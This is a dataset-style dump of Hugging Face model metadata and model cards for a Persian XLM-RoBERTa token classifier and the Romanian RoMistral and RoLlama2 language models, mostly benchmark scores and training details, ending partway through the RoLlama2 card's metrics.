modelId
stringlengths 5
139
| author
stringlengths 2
42
| last_modified
timestamp[us, tz=UTC]date 2020-02-15 11:33:14
2025-06-27 12:29:05
| downloads
int64 0
223M
| likes
int64 0
11.7k
| library_name
stringclasses 500
values | tags
sequencelengths 1
4.05k
| pipeline_tag
stringclasses 54
values | createdAt
timestamp[us, tz=UTC]date 2022-03-02 23:29:04
2025-06-27 12:27:55
| card
stringlengths 11
1.01M
|
---|---|---|---|---|---|---|---|---|---|
rezzzzzaaaaaa/xlm-roberta-base-finetuned-arman-fa | rezzzzzaaaaaa | 2024-10-10T13:44:08Z | 134 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"xlm-roberta",
"token-classification",
"generated_from_trainer",
"base_model:FacebookAI/xlm-roberta-base",
"base_model:finetune:FacebookAI/xlm-roberta-base",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | token-classification | 2024-10-10T13:16:51Z | ---
library_name: transformers
license: mit
base_model: xlm-roberta-base
tags:
- generated_from_trainer
metrics:
- f1
model-index:
- name: xlm-roberta-base-finetuned-arman-fa
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# xlm-roberta-base-finetuned-arman-fa
This model is a fine-tuned version of [xlm-roberta-base](https://huggingface.co/xlm-roberta-base) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.0092
- F1: 0.9849
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 5
### Training results
| Training Loss | Epoch | Step | Validation Loss | F1 |
|:-------------:|:-----:|:-----:|:---------------:|:------:|
| 0.1055 | 1.0 | 2305 | 0.0489 | 0.8743 |
| 0.0377 | 2.0 | 4610 | 0.0297 | 0.9117 |
| 0.0159 | 3.0 | 6915 | 0.0190 | 0.9541 |
| 0.0066 | 4.0 | 9220 | 0.0109 | 0.9781 |
| 0.0025 | 5.0 | 11525 | 0.0092 | 0.9849 |
### Framework versions
- Transformers 4.45.1
- Pytorch 2.4.0
- Datasets 3.0.1
- Tokenizers 0.20.0
|
OpenLLM-Ro/RoMistral-7b-Instruct-2024-05-17 | OpenLLM-Ro | 2024-10-10T13:39:53Z | 58 | 4 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"conversational",
"ro",
"dataset:OpenLLM-Ro/ro_sft_alpaca",
"dataset:OpenLLM-Ro/ro_sft_alpaca_gpt4",
"dataset:OpenLLM-Ro/ro_sft_dolly",
"dataset:OpenLLM-Ro/ro_sft_selfinstruct_gpt4",
"dataset:OpenLLM-Ro/ro_sft_norobots",
"dataset:OpenLLM-Ro/ro_sft_orca",
"dataset:OpenLLM-Ro/ro_sft_camel",
"arxiv:2406.18266",
"base_model:mistralai/Mistral-7B-v0.1",
"base_model:finetune:mistralai/Mistral-7B-v0.1",
"license:cc-by-nc-4.0",
"model-index",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-05-14T16:55:16Z | ---
license: cc-by-nc-4.0
language:
- ro
base_model:
- mistralai/Mistral-7B-v0.1
datasets:
- OpenLLM-Ro/ro_sft_alpaca
- OpenLLM-Ro/ro_sft_alpaca_gpt4
- OpenLLM-Ro/ro_sft_dolly
- OpenLLM-Ro/ro_sft_selfinstruct_gpt4
- OpenLLM-Ro/ro_sft_norobots
- OpenLLM-Ro/ro_sft_orca
- OpenLLM-Ro/ro_sft_camel
model-index:
- name: OpenLLM-Ro/RoMistral-7b-Instruct-2024-05-17
results:
- task:
type: text-generation
dataset:
name: RoMT-Bench
type: RoMT-Bench
metrics:
- name: Score
type: Score
value: 4.99
- task:
type: text-generation
dataset:
name: RoCulturaBench
type: RoCulturaBench
metrics:
- name: Score
type: Score
value: 3.38
- task:
type: text-generation
dataset:
name: Romanian_Academic_Benchmarks
type: Romanian_Academic_Benchmarks
metrics:
- name: Average accuracy
type: accuracy
value: 52.54
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_arc_challenge
type: OpenLLM-Ro/ro_arc_challenge
metrics:
- name: Average accuracy
type: accuracy
value: 50.41
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_mmlu
type: OpenLLM-Ro/ro_mmlu
metrics:
- name: Average accuracy
type: accuracy
value: 51.61
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_winogrande
type: OpenLLM-Ro/ro_winogrande
metrics:
- name: Average accuracy
type: accuracy
value: 66.48
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_hellaswag
type: OpenLLM-Ro/ro_hellaswag
metrics:
- name: Average accuracy
type: accuracy
value: 60.27
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_gsm8k
type: OpenLLM-Ro/ro_gsm8k
metrics:
- name: Average accuracy
type: accuracy
value: 34.19
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_truthfulqa
type: OpenLLM-Ro/ro_truthfulqa
metrics:
- name: Average accuracy
type: accuracy
value: 52.30
- task:
type: text-generation
dataset:
name: LaRoSeDa_binary
type: LaRoSeDa_binary
metrics:
- name: Average macro-f1
type: macro-f1
value: 97.36
- task:
type: text-generation
dataset:
name: LaRoSeDa_multiclass
type: LaRoSeDa_multiclass
metrics:
- name: Average macro-f1
type: macro-f1
value: 67.55
- task:
type: text-generation
dataset:
name: LaRoSeDa_binary_finetuned
type: LaRoSeDa_binary_finetuned
metrics:
- name: Average macro-f1
type: macro-f1
value: 98.80
- task:
type: text-generation
dataset:
name: LaRoSeDa_multiclass_finetuned
type: LaRoSeDa_multiclass_finetuned
metrics:
- name: Average macro-f1
type: macro-f1
value: 88.28
- task:
type: text-generation
dataset:
name: WMT_EN-RO
type: WMT_EN-RO
metrics:
- name: Average bleu
type: bleu
value: 27.93
- task:
type: text-generation
dataset:
name: WMT_RO-EN
type: WMT_RO-EN
metrics:
- name: Average bleu
type: bleu
value: 13.21
- task:
type: text-generation
dataset:
name: WMT_EN-RO_finetuned
type: WMT_EN-RO_finetuned
metrics:
- name: Average bleu
type: bleu
value: 28.72
- task:
type: text-generation
dataset:
name: WMT_RO-EN_finetuned
type: WMT_RO-EN_finetuned
metrics:
- name: Average bleu
type: bleu
value: 40.86
- task:
type: text-generation
dataset:
name: XQuAD
type: XQuAD
metrics:
- name: Average exact_match
type: exact_match
value: 43.66
- task:
type: text-generation
dataset:
name: XQuAD
type: XQuAD
metrics:
- name: Average f1
type: f1
value: 63.70
- task:
type: text-generation
dataset:
name: XQuAD_finetuned
type: XQuAD_finetuned
metrics:
- name: Average exact_match
type: exact_match
value: 55.04
- task:
type: text-generation
dataset:
name: XQuAD_finetuned
type: XQuAD_finetuned
metrics:
- name: Average f1
type: f1
value: 72.31
- task:
type: text-generation
dataset:
name: STS
type: STS
metrics:
- name: Average spearman
type: spearman
value: 77.43
- task:
type: text-generation
dataset:
name: STS
type: STS
metrics:
- name: Average pearson
type: pearson
value: 78.43
- task:
type: text-generation
dataset:
name: STS_finetuned
type: STS_finetuned
metrics:
- name: Average spearman
type: spearman
value: 87.25
- task:
type: text-generation
dataset:
name: STS_finetuned
type: STS_finetuned
metrics:
- name: Average pearson
type: pearson
value: 87.79
- task:
type: text-generation
dataset:
name: RoMT-Bench
type: RoMT-Bench
metrics:
- name: First turn
type: Score
value: 5.46
- name: Second turn
type: Score
value: 4.53
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_arc_challenge
type: OpenLLM-Ro/ro_arc_challenge
metrics:
- name: 0-shot
type: accuracy
value: 47.47
- name: 1-shot
type: accuracy
value: 48.59
- name: 3-shot
type: accuracy
value: 50.30
- name: 5-shot
type: accuracy
value: 51.33
- name: 10-shot
type: accuracy
value: 52.36
- name: 25-shot
type: accuracy
value: 52.44
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_mmlu
type: OpenLLM-Ro/ro_mmlu
metrics:
- name: 0-shot
type: accuracy
value: 50.01
- name: 1-shot
type: accuracy
value: 50.18
- name: 3-shot
type: accuracy
value: 53.13
- name: 5-shot
type: accuracy
value: 53.12
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_winogrande
type: OpenLLM-Ro/ro_winogrande
metrics:
- name: 0-shot
type: accuracy
value: 64.96
- name: 1-shot
type: accuracy
value: 67.09
- name: 3-shot
type: accuracy
value: 67.01
- name: 5-shot
type: accuracy
value: 66.85
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_hellaswag
type: OpenLLM-Ro/ro_hellaswag
metrics:
- name: 0-shot
type: accuracy
value: 59.99
- name: 1-shot
type: accuracy
value: 59.48
- name: 3-shot
type: accuracy
value: 60.14
- name: 5-shot
type: accuracy
value: 60.61
- name: 10-shot
type: accuracy
value: 61.12
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_gsm8k
type: OpenLLM-Ro/ro_gsm8k
metrics:
- name: 1-shot
type: accuracy
value: 21.68
- name: 3-shot
type: accuracy
value: 38.21
- name: 5-shot
type: accuracy
value: 42.68
- task:
type: text-generation
dataset:
name: LaRoSeDa_binary
type: LaRoSeDa_binary
metrics:
- name: 0-shot
type: macro-f1
value: 97.27
- name: 1-shot
type: macro-f1
value: 96.37
- name: 3-shot
type: macro-f1
value: 97.97
- name: 5-shot
type: macro-f1
value: 97.83
- task:
type: text-generation
dataset:
name: LaRoSeDa_multiclass
type: LaRoSeDa_multiclass
metrics:
- name: 0-shot
type: macro-f1
value: 63.95
- name: 1-shot
type: macro-f1
value: 66.89
- name: 3-shot
type: macro-f1
value: 68.16
- name: 5-shot
type: macro-f1
value: 71.19
- task:
type: text-generation
dataset:
name: WMT_EN-RO
type: WMT_EN-RO
metrics:
- name: 0-shot
type: bleu
value: 24.87
- name: 1-shot
type: bleu
value: 28.30
- name: 3-shot
type: bleu
value: 29.26
- name: 5-shot
type: bleu
value: 29.27
- task:
type: text-generation
dataset:
name: WMT_RO-EN
type: WMT_RO-EN
metrics:
- name: 0-shot
type: bleu
value: 3.69
- name: 1-shot
type: bleu
value: 5.45
- name: 3-shot
type: bleu
value: 19.92
- name: 5-shot
type: bleu
value: 23.80
- task:
type: text-generation
dataset:
name: XQuAD_EM
type: XQuAD_EM
metrics:
- name: 0-shot
type: exact_match
value: 23.36
- name: 1-shot
type: exact_match
value: 47.98
- name: 3-shot
type: exact_match
value: 51.85
- name: 5-shot
type: exact_match
value: 51.43
- task:
type: text-generation
dataset:
name: XQuAD_F1
type: XQuAD_F1
metrics:
- name: 0-shot
type: f1
value: 46.29
- name: 1-shot
type: f1
value: 67.40
- name: 3-shot
type: f1
value: 70.58
- name: 5-shot
type: f1
value: 70.53
- task:
type: text-generation
dataset:
name: STS_Spearman
type: STS_Spearman
metrics:
- name: 1-shot
type: spearman
value: 77.91
- name: 3-shot
type: spearman
value: 77.73
- name: 5-shot
type: spearman
value: 76.65
- task:
type: text-generation
dataset:
name: STS_Pearson
type: STS_Pearson
metrics:
- name: 1-shot
type: pearson
value: 78.03
- name: 3-shot
type: pearson
value: 78.74
- name: 5-shot
type: pearson
value: 78.53
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
RoMistral is a family of pretrained and fine-tuned generative text models for Romanian. This is the repository for the **instruct 7B model**. Links to other models can be found at the bottom of this page.
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
OpenLLM-Ro represents the first open-source effort to build a LLM specialized for Romanian. OpenLLM-Ro developed and publicly releases a collection of Romanian LLMs, both in the form of foundational model and instruct and chat variants.
- **Developed by:** OpenLLM-Ro
<!-- - **Funded by [optional]:** [More Information Needed] -->
<!-- - **Shared by [optional]:** [More Information Needed] -->
<!-- - **Model type:** [More Information Needed] -->
- **Language(s):** Romanian
- **License:** cc-by-nc-4.0
- **Finetuned from model:** [Mistral-7B-v0.1](https://huggingface.co/mistralai/Mistral-7B-v0.1)
- **Trained using:** [RoAlpaca](https://huggingface.co/datasets/OpenLLM-Ro/ro_sft_alpaca), [RoAlpacaGPT4](https://huggingface.co/datasets/OpenLLM-Ro/ro_sft_alpaca_gpt4), [RoDolly](https://huggingface.co/datasets/OpenLLM-Ro/ro_sft_dolly), [RoSelfInstruct](https://huggingface.co/datasets/OpenLLM-Ro/ro_sft_selfinstruct_gpt4), [RoNoRobots](https://huggingface.co/datasets/OpenLLM-Ro/ro_sft_norobots), [RoOrca](https://huggingface.co/datasets/OpenLLM-Ro/ro_sft_orca), [RoCamel](https://huggingface.co/datasets/OpenLLM-Ro/ro_sft_camel)
<!-- - **Finetuned from model [optional]:** [More Information Needed] -->
### Model Sources
<!-- Provide the basic links for the model. -->
- **Repository:** https://github.com/OpenLLM-Ro/LLaMA-Factory
- **Paper:** https://arxiv.org/abs/2406.18266
## Intended Use
### Intended Use Cases
RoMistral is intented for research use in Romanian. Base models can be adapted for a variety of natural language tasks while instruction and chat tuned models are intended for assistant-like chat.
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
Use in any manner that violates the license, any applicable laws or regluations, use in languages other than Romanian.
## How to Get Started with the Model
Use the code below to get started with the model.
```python
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("OpenLLM-Ro/RoMistral-7b-Instruct-05-17")
model = AutoModelForCausalLM.from_pretrained("OpenLLM-Ro/RoMistral-7b-Instruct-05-17")
instruction = "Ce jocuri de societate pot juca cu prietenii mei?"
chat = [
{"role": "user", "content": instruction},
]
prompt = tokenizer.apply_chat_template(chat, tokenize=False, system_message="")
inputs = tokenizer.encode(prompt, add_special_tokens=False, return_tensors="pt")
outputs = model.generate(input_ids=inputs, max_new_tokens=128)
print(tokenizer.decode(outputs[0]))
```
## Academic Benchmarks
<table>
<tbody>
<tr>
<td><strong>Model</strong></td>
<td><strong><center>Average</center></strong></td>
<td><strong><center>ARC</center></strong></td>
<td><strong><center>MMLU</center></strong></td>
<td><strong><center>Winogrande</center></strong></td>
<td><strong><center>Hellaswag</center></strong></td>
<td><strong><center>GSM8k</center></strong></td>
<td><strong><center>TruthfulQA</center></strong></td>
</tr>
<tr>
<td>Mistral-7B-Instruct-v0.2</td><td><center>47.40</center></td><td><center>46.29</center></td><td><center>47.00</center></td><td><center>58.78</center></td><td><center>54.27</center></td><td><center>13.47</center></td><td><center><strong>64.59</strong></center></td>
</tr>
<tr>
<td><em>RoMistral-7b-Instruct-2024-05-17</em></td><td><center><em>52.54</em></center></td><td><center><em>50.41</em></center></td><td><center><em><strong>51.61</strong></em></center></td><td><center><em>66.48</em></center></td><td><center><em>60.27</em></center></td><td><center><em><strong>34.19</strong></em></center></td><td><center><em>52.30</em></center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-2024-10-09</td><td><center><strong>52.91</strong></center></td><td><center><strong>52.27</strong></center></td><td><center>49.33</center></td><td><center><strong>70.03</strong></center></td><td><center><strong>62.88</strong></center></td><td><center>32.42</center></td><td><center>50.51</center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-DPO-2024-10-09</td><td><center>51.95</center></td><td><center>50.73</center></td><td><center>47.88</center></td><td><center>68.41</center></td><td><center>62.27</center></td><td><center>32.27</center></td><td><center>50.12</center></td>
</tr>
</tbody>
</table>
## Downstream tasks
<table>
<tbody>
<tr>
<td></td>
<td colspan="4"><center><strong>LaRoSeDa</strong></center></td>
<td colspan="4"><center><strong>WMT</strong></center></td>
</tr>
<tr>
<td></td>
<td colspan="2"><center><strong>Few-shot</strong></center></td>
<td colspan="2"><center><strong>Finetuned</strong></center></td>
<td colspan="2"><center><strong>Few-shot</strong></center></td>
<td colspan="2"><center><strong>Finetuned</strong></center></td>
</tr>
<tr>
<td><strong>Model</strong></td>
<td><center><strong>Binary<br>(Macro F1)</strong></center></td>
<td><center><strong>Multiclass<br>(Macro F1)</strong></center></td>
<td><center><strong>Binary<br>(Macro F1)</strong></center></td>
<td><center><strong>Multiclass<br>(Macro F1)</strong></center></td>
<td><center><strong>EN-RO<br>(Bleu)</strong></center></td>
<td><center><strong>RO-EN<br>(Bleu)</strong></center></td>
<td><center><strong>EN-RO<br>(Bleu)</strong></center></td>
<td><center><strong>RO-EN<br>(Bleu)</strong></center>
</tr>
<tr>
<td>Mistral-7B-Instruct-v0.2</td><td><center>96.97</center></td><td><center>56.66</center></td><td><center>98.83</center></td><td><center>87.32</center></td><td><center>18.60</center></td><td><center><strong>33.99</strong></center></td><td><center>26.19</center></td><td><center>39.88</center></td>
</tr>
<tr>
<td><em>RoMistral-7b-Instruct-2024-05-17</em></td><td><center><em><strong>97.36</strong></em></center></td><td><center><em>67.55</em></center></td><td><center><em>98.80</em></center></td><td><center><em><strong>88.28</strong></em></center></td><td><center><em>27.93</em></center></td><td><center><em>13.21</em></center></td><td><center><em><strong>28.72</strong></em></center></td><td><center><em><strong>40.86</strong></em></center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-2024-10-09</td><td><center>95.56</center></td><td><center><strong>67.83</strong></center></td><td><center><strong>99.00</strong></center></td><td><center>87.57</center></td><td><center><strong>28.28</strong></center></td><td><center>6.10</center></td><td><center>27.70</center></td><td><center>40.36</center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-DPO-2024-10-09</td><td><center>82.13</center></td><td><center>65.24</center></td><td><center>-</center></td><td><center>-</center></td><td><center>26.25</center></td><td><center>6.09</center></td><td><center>-</center></td><td><center>-</center></td>
</tr>
</tbody>
</table>
<table>
<tbody>
<tr>
<td></td>
<td colspan="4"><center><strong>XQuAD</strong></center></td>
<td colspan="4"><center><strong>STS</strong></center></td>
</tr>
<tr>
<td></td>
<td colspan="2"><center><strong>Few-shot</strong></center></td>
<td colspan="2"><center><strong>Finetuned</strong></center></td>
<td colspan="2"><center><strong>Few-shot</strong></center></td>
<td colspan="2"><center><strong>Finetuned</strong></center></td>
</tr>
<tr>
<td><strong>Model</strong></td>
<td><center><strong>(EM)</strong></center></td>
<td><center><strong>(F1)</strong></center></td>
<td><center><strong>(EM)</strong></center></td>
<td><center><strong>(F1)</strong></center></td>
<td><center><strong>(Spearman)</strong></center></td>
<td><center><strong>(Pearson)</strong></center></td>
<td><center><strong>(Spearman)</strong></center></td>
<td><center><strong>(Pearson)</strong></center></td>
</tr>
<tr>
<td>Mistral-7B-Instruct-v0.2</td><td><center>27.92</center></td><td><center>50.71</center></td><td><center><strong>65.46</strong></center></td><td><center><strong>79.73</strong></center></td><td><center>62.62</center></td><td><center>60.86</center></td><td><center>84.92</center></td><td><center>85.44</center></td>
</tr>
<tr>
<td><em>RoMistral-7b-Instruct-2024-05-17</em></td><td><center><em><strong>43.66</strong></em></center></td><td><center><em><strong>63.70</strong></em></center></td><td><center><em>55.04</em></center></td><td><center><em>72.31</em></center></td><td><center><em>77.43</em></center></td><td><center><em><strong>78.43</strong></em></center></td><td><center><em>87.25</em></center></td><td><center><em>87.79</em></center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-2024-10-09</td><td><center>41.09</center></td><td><center>63.21</center></td><td><center>47.56</center></td><td><center>62.69</center></td><td><center><strong>78.47</strong></center></td><td><center>77.24</center></td><td><center><strong>87.28</strong></center></td><td><center><strong>87.88</strong></center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-DPO-2024-10-09</td><td><center>23.40</center></td><td><center>45.80</center></td><td><center>-</center></td><td><center>-</center></td><td><center>77.33</center></td><td><center>76.60</center></td><td><center>-</center></td><td><center>-</center></td>
</tr>
</tbody>
</table>
## MT-Bench
<table>
<tbody>
<tr>
<td><strong>Model</strong></td>
<td><strong><center>Average</center></strong></td>
<td><strong><center>1st turn</center></strong></td>
<td><strong><center>2nd turn</center></strong></td>
<td><strong><center>Answers in Ro</center></strong></td>
</tr>
<tr>
<td>Mistral-7B-Instruct-v0.2</td><td><center>5.03</center></td><td><center>5.05</center></td><td><center>5.00</center></td><td><center>154/160</center></td>
</tr>
<tr>
<td><em>RoMistral-7b-Instruct-2024-05-17</em></td><td><center><em>4.99</em></center></td><td><center><em>5.46</em></center></td><td><center><em>4.53</em></center></td><td><center><em><strong>160/160</strong></em></center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-2024-10-09</td><td><center>5.29</center></td><td><center>5.86</center></td><td><center>4.72</center></td><td><center><strong>160/160</strong></center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-DPO-2024-10-09</td><td><center><strong>5.88</strong></center></td><td><center><strong>6.44</strong></center></td><td><center><strong>5.33</strong></center></td><td><center><strong>160/160</strong></center></td>
</tr>
</tbody>
</table>
## RoCulturaBench
<table>
<tbody>
<tr>
<td><strong>Model</strong></td>
<td><strong><center>Average</center></strong></td>
<td><strong><center>Answers in Ro</center></strong></td>
</tr>
<tr>
<td>Mistral-7B-Instruct-v0.2</td><td><center>3.68</center></td><td><center>97/100</center></td>
</tr>
<tr>
<td><em>RoMistral-7b-Instruct-2024-05-17</em></td><td><center><em>3.38</em></center></td><td><center><em><strong>100/100</strong></em></center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-2024-10-09</td><td><center>3.99</center></td><td><center><strong>100/100</strong></center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-DPO-2024-10-09</td><td><center><strong>4.72</strong></center></td><td><center><strong>100/100</strong></center></td>
</tr>
</tbody>
</table>
## RoMistral Model Family
| Model | Link |
|--------------------|:--------:|
|*RoMistral-7b-Instruct-2024-05-17*| [link](https://huggingface.co/OpenLLM-Ro/RoMistral-7b-Instruct-2024-05-17) |
|RoMistral-7b-Instruct-2024-10-09| [link](https://huggingface.co/OpenLLM-Ro/RoMistral-7b-Instruct-2024-10-09) |
|RoMistral-7b-Instruct-DPO-2024-10-09| [link](https://huggingface.co/OpenLLM-Ro/RoMistral-7b-Instruct-DPO-2024-10-09) |
## Citation
```
@misc{masala2024vorbecstiromanecsterecipetrain,
title={"Vorbe\c{s}ti Rom\^ane\c{s}te?" A Recipe to Train Powerful Romanian LLMs with English Instructions},
author={Mihai Masala and Denis C. Ilie-Ablachim and Alexandru Dima and Dragos Corlatescu and Miruna Zavelca and Ovio Olaru and Simina Terian-Dan and Andrei Terian-Dan and Marius Leordeanu and Horia Velicu and Marius Popescu and Mihai Dascalu and Traian Rebedea},
year={2024},
eprint={2406.18266},
archivePrefix={arXiv},
primaryClass={cs.CL},
url={https://arxiv.org/abs/2406.18266},
}
```
<!-- **APA:**
[More Information Needed] --> |
OpenLLM-Ro/RoLlama2-7b-Base-2024-05-14 | OpenLLM-Ro | 2024-10-10T13:35:16Z | 142 | 4 | transformers | [
"transformers",
"pytorch",
"llama",
"text-generation",
"ro",
"dataset:uonlp/CulturaX",
"arxiv:2406.18266",
"base_model:meta-llama/Llama-2-7b-hf",
"base_model:finetune:meta-llama/Llama-2-7b-hf",
"license:llama2",
"model-index",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-02-21T10:16:52Z | ---
license: llama2
language:
- ro
base_model: meta-llama/Llama-2-7b-hf
datasets:
- uonlp/CulturaX
model-index:
- name: OpenLLM-Ro/RoLlama2-7b-Base-2024-05-14
results:
- task:
type: text-generation
dataset:
name: Romanian_Academic_Benchmarks
type: Romanian_Academic_Benchmarks
metrics:
- name: Average accuracy
type: accuracy
value: 38.03
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_arc_challenge
type: OpenLLM-Ro/ro_arc_challenge
metrics:
- name: Average accuracy
type: accuracy
value: 37.95
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_mmlu
type: OpenLLM-Ro/ro_mmlu
metrics:
- name: Average accuracy
type: accuracy
value: 27.22
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_winogrande
type: OpenLLM-Ro/ro_winogrande
metrics:
- name: Average accuracy
type: accuracy
value: 59.29
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_hellaswag
type: OpenLLM-Ro/ro_hellaswag
metrics:
- name: Average accuracy
type: accuracy
value: 57.22
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_gsm8k
type: OpenLLM-Ro/ro_gsm8k
metrics:
- name: Average accuracy
type: accuracy
value: 2.53
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_truthfulqa
type: OpenLLM-Ro/ro_truthfulqa
metrics:
- name: Average accuracy
type: accuracy
value: 44.00
- task:
type: text-generation
dataset:
name: LaRoSeDa_binary
type: LaRoSeDa_binary
metrics:
- name: Average macro-f1
type: macro-f1
value: 83.25
- task:
type: text-generation
dataset:
name: LaRoSeDa_multiclass
type: LaRoSeDa_multiclass
metrics:
- name: Average macro-f1
type: macro-f1
value: 61.04
- task:
type: text-generation
dataset:
name: LaRoSeDa_binary_finetuned
type: LaRoSeDa_binary_finetuned
metrics:
- name: Average macro-f1
type: macro-f1
value: 98.97
- task:
type: text-generation
dataset:
name: LaRoSeDa_multiclass_finetuned
type: LaRoSeDa_multiclass_finetuned
metrics:
- name: Average macro-f1
type: macro-f1
value: 87.72
- task:
type: text-generation
dataset:
name: WMT_EN-RO
type: WMT_EN-RO
metrics:
- name: Average bleu
type: bleu
value: 10.01
- task:
type: text-generation
dataset:
name: WMT_RO-EN
type: WMT_RO-EN
metrics:
- name: Average bleu
type: bleu
value: 13.03
- task:
type: text-generation
dataset:
name: WMT_EN-RO_finetuned
type: WMT_EN-RO_finetuned
metrics:
- name: Average bleu
type: bleu
value: 27.85
- task:
type: text-generation
dataset:
name: WMT_RO-EN_finetuned
type: WMT_RO-EN_finetuned
metrics:
- name: Average bleu
type: bleu
value: 39.30
- task:
type: text-generation
dataset:
name: XQuAD
type: XQuAD
metrics:
- name: Average exact_match
type: exact_match
value: 30.15
- task:
type: text-generation
dataset:
name: XQuAD
type: XQuAD
metrics:
- name: Average f1
type: f1
value: 47.03
- task:
type: text-generation
dataset:
name: XQuAD_finetuned
type: XQuAD_finetuned
metrics:
- name: Average exact_match
type: exact_match
value: 67.06
- task:
type: text-generation
dataset:
name: XQuAD_finetuned
type: XQuAD_finetuned
metrics:
- name: Average f1
type: f1
value: 79.96
- task:
type: text-generation
dataset:
name: STS
type: STS
metrics:
- name: Average spearman
type: spearman
value: 7.89
- task:
type: text-generation
dataset:
name: STS
type: STS
metrics:
- name: Average pearson
type: pearson
value: 7.98
- task:
type: text-generation
dataset:
name: STS_finetuned
type: STS_finetuned
metrics:
- name: Average spearman
type: spearman
value: 71.75
- task:
type: text-generation
dataset:
name: STS_finetuned
type: STS_finetuned
metrics:
- name: Average pearson
type: pearson
value: 71.99
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_arc_challenge
type: OpenLLM-Ro/ro_arc_challenge
metrics:
- name: 0-shot
type: accuracy
value: 35.56
- name: 1-shot
type: accuracy
value: 36.42
- name: 3-shot
type: accuracy
value: 38.56
- name: 5-shot
type: accuracy
value: 38.39
- name: 10-shot
type: accuracy
value: 39.07
- name: 25-shot
type: accuracy
value: 39.67
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_mmlu
type: OpenLLM-Ro/ro_mmlu
metrics:
- name: 0-shot
type: accuracy
value: 25.82
- name: 1-shot
type: accuracy
value: 25.48
- name: 3-shot
type: accuracy
value: 27.61
- name: 5-shot
type: accuracy
value: 29.96
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_winogrande
type: OpenLLM-Ro/ro_winogrande
metrics:
- name: 0-shot
type: accuracy
value: 58.72
- name: 1-shot
type: accuracy
value: 58.88
- name: 3-shot
type: accuracy
value: 60.38
- name: 5-shot
type: accuracy
value: 59.19
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_hellaswag
type: OpenLLM-Ro/ro_hellaswag
metrics:
- name: 0-shot
type: accuracy
value: 55.85
- name: 1-shot
type: accuracy
value: 57.06
- name: 3-shot
type: accuracy
value: 57.52
- name: 5-shot
type: accuracy
value: 57.89
- name: 10-shot
type: accuracy
value: 57.79
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_gsm8k
type: OpenLLM-Ro/ro_gsm8k
metrics:
- name: 1-shot
type: accuracy
value: 0.00
- name: 3-shot
type: accuracy
value: 2.96
- name: 5-shot
type: accuracy
value: 4.62
- task:
type: text-generation
dataset:
name: LaRoSeDa_binary
type: LaRoSeDa_binary
metrics:
- name: 0-shot
type: macro-f1
value: 42.78
- name: 1-shot
type: macro-f1
value: 98.00
- name: 3-shot
type: macro-f1
value: 95.13
- name: 5-shot
type: macro-f1
value: 97.07
- task:
type: text-generation
dataset:
name: LaRoSeDa_multiclass
type: LaRoSeDa_multiclass
metrics:
- name: 0-shot
type: macro-f1
value: 46.41
- name: 1-shot
type: macro-f1
value: 67.36
- name: 3-shot
type: macro-f1
value: 65.16
- name: 5-shot
type: macro-f1
value: 65.23
- task:
type: text-generation
dataset:
name: WMT_EN-RO
type: WMT_EN-RO
metrics:
- name: 0-shot
type: bleu
value: 4.45
- name: 1-shot
type: bleu
value: 8.61
- name: 3-shot
type: bleu
value: 12.25
- name: 5-shot
type: bleu
value: 14.73
- task:
type: text-generation
dataset:
name: WMT_RO-EN
type: WMT_RO-EN
metrics:
- name: 0-shot
type: bleu
value: 1.29
- name: 1-shot
type: bleu
value: 10.78
- name: 3-shot
type: bleu
value: 16.82
- name: 5-shot
type: bleu
value: 23.24
- task:
type: text-generation
dataset:
name: XQuAD_EM
type: XQuAD_EM
metrics:
- name: 0-shot
type: exact_match
value: 5.29
- name: 1-shot
type: exact_match
value: 33.95
- name: 3-shot
type: exact_match
value: 39.24
- name: 5-shot
type: exact_match
value: 42.10
- task:
